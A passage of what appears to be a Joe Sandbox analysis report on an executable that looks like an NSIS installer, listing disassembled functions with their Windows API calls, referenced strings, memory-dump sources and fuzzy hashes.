                                  • Part of subcall function 004068C1: GetProcAddress.KERNEL32(00000000), ref: 004068EB
                                • lstrcatW.KERNEL32(00436000,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000,00000002,00000000,76073420,00000000,76073170), ref: 00405A9C
                                • lstrlenW.KERNEL32(00427CA0,?,?,?,00427CA0,00000000,00434800,00436000,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000,00000002,00000000), ref: 00405B20
                                • lstrcmpiW.KERNEL32(-000000FC,.exe,00427CA0,?,?,?,00427CA0,00000000,00434800,00436000,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000), ref: 00405B35
                                • GetFileAttributesW.KERNEL32(00427CA0), ref: 00405B40
                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00405B89
                                  • Part of subcall function 004065FA: wsprintfW.USER32 ref: 00406607
                                • RegisterClassW.USER32(00428CA0), ref: 00405BCE
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405BE5
                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C1A
                                • ShowWindow.USER32(00000005,00000000), ref: 00405C4C
                                • GetClassInfoW.USER32(00000000,RichEdit20W,00428CA0), ref: 00405C77
                                • GetClassInfoW.USER32(00000000,RichEdit,00428CA0), ref: 00405C84
                                • RegisterClassW.USER32(00428CA0), ref: 00405C91
                                • DialogBoxParamW.USER32(?,00000000,00404F6D,00000000), ref: 00405CAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                • API String ID: 1975747703-1115850852
                                • Opcode ID: 7826c34372ab1de799e47c1a445c5beb8b4d289113b4383a7413856266521f1e
                                • Instruction ID: 997547c739dba09290e01480a6769471c967da196cfb38af9b733d4135fa1862
                                • Opcode Fuzzy Hash: 7826c34372ab1de799e47c1a445c5beb8b4d289113b4383a7413856266521f1e
                                • Instruction Fuzzy Hash: 1A610370201601BAE620AB76AD42F2B366CEB04758F51443FF945B62E1DF78AC018B7D
                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 128COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • DefWindowProcW.USER32(?,?,?,?), ref: 0040102E
                                • BeginPaint.USER32(?,?), ref: 0040104C
                                • GetClientRect.USER32(?,?), ref: 00401062
                                • CreateBrushIndirect.GDI32(00000000), ref: 004010DF
                                • FillRect.USER32(00000000,?,00000000), ref: 004010F3
                                • DeleteObject.GDI32(00000000), ref: 004010FA
                                • CreateFontIndirectW.GDI32(?), ref: 00401120
                                • SetBkMode.GDI32(00000000,00000001), ref: 00401143
                                • SetTextColor.GDI32(00000000,000000FF), ref: 0040114D
                                • SelectObject.GDI32(00000000,00000000), ref: 0040115B
                                • DrawTextW.USER32(00000000,00428D00,000000FF,?,00000820), ref: 00401171
                                • SelectObject.GDI32(00000000,00000000), ref: 00401179
                                • DeleteObject.GDI32(?), ref: 0040117F
                                • EndPaint.USER32(?,?), ref: 0040118E
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                • String ID: F
                                • API String ID: 941294808-1304234792
                                • Opcode ID: d731168a47aac58058028b36b6280044d0ca24b31d8de32a1a16c1507812eb21
                                • Instruction ID: d36771556e1314171d00f7341d5a6d6cd4ef22ea24e197e6f7dda2bcd3f0aae3
                                • Opcode Fuzzy Hash: d731168a47aac58058028b36b6280044d0ca24b31d8de32a1a16c1507812eb21
                                • Instruction Fuzzy Hash: 3041AD720083509FC7159F65CE4896BBBE9FF88715F150A2EF9D1A22A0CA34C904CFA6
                                Function 0040154A Relevance: 25.9, APIs: 17, Instructions: 441stringtimesleepCOMMON
                                Download Yara Rule
                                APIs
                                • PostQuitMessage.USER32(00000000), ref: 004015F1
                                • Sleep.KERNEL32(00000001,?,00000000,00000000), ref: 00401628
                                • SetForegroundWindow.USER32 ref: 00401634
                                • ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
                                • ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
                                • SetFileAttributesW.KERNEL32(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
                                • GetFileAttributesW.KERNEL32(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
                                • SetCurrentDirectoryW.KERNEL32(00000000,00435000,00000000,000000E6,0040A8C8), ref: 004017A3
                                • MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
                                • GetFullPathNameW.KERNEL32(00000000,00000400,00000000,0040A8C8,00000000,000000E3,0040A8C8,?,?,00000000,00000000), ref: 00401843
                                • GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
                                • lstrcatW.KERNEL32(00000000,00000000,0040A0C8,00435000,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
                                • CompareFileTime.KERNEL32(-00000014,00000000,0040A0C8,0040A0C8,00000000,00000000,0040A0C8,00435000,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
                                • SetFileTime.KERNEL32(00000000,000000FF,00000000,000000FF,0040A0C8,00000000,00000000,00000000,000000EA,00000000,0040A0C8,40000000,00000001,0040A0C8,00000000), ref: 00401A5A
                                • CloseHandle.KERNEL32(00000000), ref: 00401A61
                                • lstrcatW.KERNEL32(0040A0C8,00000000,0040A0C8,000000E9), ref: 00401A82
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
                                • String ID:
                                • API String ID: 3895412863-0
                                • Opcode ID: b1db98a04f2ea93b77a26ffd797c3cbd4516fe2c3c1e967b323529ad46c310ba
                                • Instruction ID: ebeff723cfbe9b45e3b0b0a6f17a4e6c0cbf30734010ce9bbeaf93aeca8f714e
                                • Opcode Fuzzy Hash: b1db98a04f2ea93b77a26ffd797c3cbd4516fe2c3c1e967b323529ad46c310ba
                                • Instruction Fuzzy Hash: 93D1F971614301ABC720BF26CD85D2B76A8EF85758F10463FF452B22E1DB7CD8029A6E
                                Function 004062E1 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 124memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,?,00406239,?,?), ref: 0040631C
                                • GetShortPathNameW.KERNEL32(00000000,00426E48,00000400), ref: 00406325
                                • GetShortPathNameW.KERNEL32(?,00426648,00000400), ref: 00406342
                                • wsprintfA.USER32 ref: 00406360
                                • GetFileSize.KERNEL32(00000000,00000000,00426648,C0000000,00000004,00426648,?), ref: 00406398
                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063A8
                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063D8
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00426248,00000000,-0000000A,00408984,00000000,[Rename],00000000,00000000,00000000), ref: 004063F8
                                • GlobalFree.KERNEL32(00000000), ref: 0040640A
                                • CloseHandle.KERNEL32(00000000), ref: 00406411
                                  • Part of subcall function 004068F6: GetFileAttributesW.KERNEL32(00000003,0040340A,00437800,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                  • Part of subcall function 004068F6: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                • String ID: %ls=%ls$HfB$HnB$[Rename]
                                • API String ID: 2900126502-165592708
                                • Opcode ID: 0ea2030678874ad7a3f9729cc5491540557c07a213c150c7bef55d2ab97d4cc7
                                • Instruction ID: 28d4088f706ad7906ef0a9a5075647bec21de1d5f4d95c1c1de34b852c29caff
                                • Opcode Fuzzy Hash: 0ea2030678874ad7a3f9729cc5491540557c07a213c150c7bef55d2ab97d4cc7
                                • Instruction Fuzzy Hash: 9431E5B12002217BD6206B359D49F7B3A5CDF81748F56443EF942BA2C2DA7DD8624A7C
                                Function 00404060 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 281COMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,000003FB), ref: 004040B1
                                • SetWindowTextW.USER32(00000000,?), ref: 004040DB
                                  • Part of subcall function 00406A15: GetDlgItemTextW.USER32(?,?,00000400,00404F27), ref: 00406A28
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406D8D
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406DA1
                                  • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406DB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Char$Next$ItemText$PrevWindow
                                • String ID: A
                                • API String ID: 4089110348-3554254475
                                • Opcode ID: 7ee0f7904150dc878aeeec4f98168d1ec89735afe044028777f232ef559c64d1
                                • Instruction ID: 90192ee12d8343b5cbbbf9dcfc6b809e920884bf694149bd8a4c84d13eeda86d
                                • Opcode Fuzzy Hash: 7ee0f7904150dc878aeeec4f98168d1ec89735afe044028777f232ef559c64d1
                                • Instruction Fuzzy Hash: E391B1B1704311ABD720AFA6DD81A6B76A8AF84704F40043FFB45B62D1DB7CD9418B6E
                                Function 004033C8 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 178memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetTickCount.KERNEL32 ref: 004033DB
                                • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400,?,?,?,?,?), ref: 004033F7
                                  • Part of subcall function 004068F6: GetFileAttributesW.KERNEL32(00000003,0040340A,00437800,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                  • Part of subcall function 004068F6: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003,?,?,?,?,?), ref: 00403441
                                • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?), ref: 0040359B
                                Strings
                                • Null, xrefs: 004034C9
                                • soft, xrefs: 004034BF
                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040361B
                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004033CE
                                • Error launching installer, xrefs: 00403417
                                • Inst, xrefs: 004034B5
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                • API String ID: 2803837635-787788815
                                • Opcode ID: 063ae2e08def868f8eacef01b396c4efa7ff10199d47aae5f76f976b6e82b3ce
                                • Instruction ID: a22a3d629960f4d7b6f8438a3768dc05bd31f949a9b5a180d7de35419ae1bb07
                                • Opcode Fuzzy Hash: 063ae2e08def868f8eacef01b396c4efa7ff10199d47aae5f76f976b6e82b3ce
                                • Instruction Fuzzy Hash: 2B51EE71640300AFD720AF21DD81B1B7AA8AB88719F10493FF985772E1C7398E458B6E
                                Function 32E1A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: HEAP:
                                • API String ID: 3446177414-2466845122
                                • Opcode ID: 4d892a74a398271a3eb768a347cca903e8cd2725cbd2fecb733c40d6b6cbcab0
                                • Instruction ID: f6b79509155fbd2e223b9687e5578e38560cf82aa1bedb5a803c09f57a12c1f7
                                • Opcode Fuzzy Hash: 4d892a74a398271a3eb768a347cca903e8cd2725cbd2fecb733c40d6b6cbcab0
                                • Instruction Fuzzy Hash: 2FA18B75A043118FD708CE28C896A2AB7E5FF88358F59897DEA45DB310EB70EC45CB91
                                Function 00405E95 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 209stringCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemDirectoryW.KERNEL32(00427CA0,00000400), ref: 00405FBF
                                  • Part of subcall function 00406AF5: lstrcpynW.KERNEL32(?,?,00000400,0040384C,00428D00,NSIS Error), ref: 00406B02
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406D8D
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406DA1
                                  • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406DB9
                                • GetWindowsDirectoryW.KERNEL32(00427CA0,00000400,00424200,?,?,?,?,?,00000000,?,?), ref: 00405FD2
                                • lstrcatW.KERNEL32(00427CA0,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,?,?,?,?,00000000,?,?), ref: 0040604B
                                • lstrlenW.KERNEL32(00427CA0,00424200,?,?,?,?,?,00000000,?,?), ref: 004060A5
                                Strings
                                • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406045
                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405F8A
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                • API String ID: 4187626192-730719616
                                • Opcode ID: e881fb0b28361bdc3f8f7ae5213684426e418320bb2e4e194c901d83aeea876e
                                • Instruction ID: 94fe74e46bfd99ff5e6600c27bcf33d7150fb5fb58e2d65541bf0035bd99d3a3
                                • Opcode Fuzzy Hash: e881fb0b28361bdc3f8f7ae5213684426e418320bb2e4e194c901d83aeea876e
                                • Instruction Fuzzy Hash: 0F61E5312442159BDB20AB288D40A3B77A4EF58750F11443FF986F72D1DB7CD9219BAE
                                Function 32D77550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                Download Yara Rule
                                Strings
                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 32DB4592
                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32DB4460
                                • Execute=1, xrefs: 32DB451E
                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 32DB454D
                                • ExecuteOptions, xrefs: 32DB44AB
                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32DB4530
                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 32DB4507
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                • API String ID: 0-484625025
                                • Opcode ID: 20417e84a9a0dc4e9e07421efb340009da0a47822612df4fe5165c54fe5f119a
                                • Instruction ID: 68c46373b1acd962265a3e7a698ffc65856be9a51ede7c4d93274fe443e87027
                                • Opcode Fuzzy Hash: 20417e84a9a0dc4e9e07421efb340009da0a47822612df4fe5165c54fe5f119a
                                • Instruction Fuzzy Hash: B651B471A00359AAFF14DFA8EC95FAD77A8AF08744F4008E9D505A7381EFB4DA45CE60
                                Function 32D5A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                Download Yara Rule
                                Strings
                                • SsHd, xrefs: 32D5A304
                                • Actx , xrefs: 32DA7819, 32DA7880
                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 32DA77DD, 32DA7802
                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32DA7807
                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32DA77E2
                                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 32DA78F3
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                • API String ID: 0-1988757188
                                • Opcode ID: e96549bfc15c61eda963decbf2ac7711bc26cf2cda0d2d876f8c66553204eb34
                                • Instruction ID: 4bf356d602ef98d4573ef7908d3b58b0cc0fb73d1004876675b611fe10fa72ef
                                • Opcode Fuzzy Hash: e96549bfc15c61eda963decbf2ac7711bc26cf2cda0d2d876f8c66553204eb34
                                • Instruction Fuzzy Hash: BDE1D1746043128FFB05CE64C890B5E77E1BF85368F604A2DE9A5CB390DBB1D945CB92
                                Function 32D5D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • Actx , xrefs: 32DA9315
                                • GsHd, xrefs: 32D5D794
                                • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 32DA9372
                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 32DA914E, 32DA9173
                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32DA9178
                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32DA9153
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                • API String ID: 3446177414-2196497285
                                • Opcode ID: 24fae1df5e06af59140079425f3b9bf7475d665785853b870968a9a61e66b9fc
                                • Instruction ID: 2590af2b87b62bd9aeee32bfe6abaa0d0fd3ddea4a67f5de622bec0d4c78c816
                                • Opcode Fuzzy Hash: 24fae1df5e06af59140079425f3b9bf7475d665785853b870968a9a61e66b9fc
                                • Instruction Fuzzy Hash: E2E1A374604341CFEB04CF14C890B4ABBE4BF88758F504A6DE995CB395DBB5E844CBA2
                                Function 32DBFA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                • API String ID: 3446177414-4227709934
                                • Opcode ID: cf03ef153d0e8247d7d147d808c9955694e44830059b7af548a27eb457613414
                                • Instruction ID: aa63c9da7dc5df7745d4369934f4c2feba04342501ba1d2f1a90fb5f888ad9ce
                                • Opcode Fuzzy Hash: cf03ef153d0e8247d7d147d808c9955694e44830059b7af548a27eb457613414
                                • Instruction Fuzzy Hash: 184149B9A01209AFDF05CF98C891ADEBBB5EF49758F504029F905AB350DB71DA41CBA0
                                Function 00405736 Relevance: 12.1, APIs: 8, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                • String ID:
                                • API String ID: 2320649405-0
                                • Opcode ID: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                • Instruction ID: fd6d678b7fcced70b4665a1fbec2e56912b3eb02c270adc19d2dd25120f6a122
                                • Opcode Fuzzy Hash: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                • Instruction Fuzzy Hash: 4B21F675500B04DFDB749F28DA4895B77B4EF05710B108A3EE896B26A1DB38E814CF24
                                Function 32DEF8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
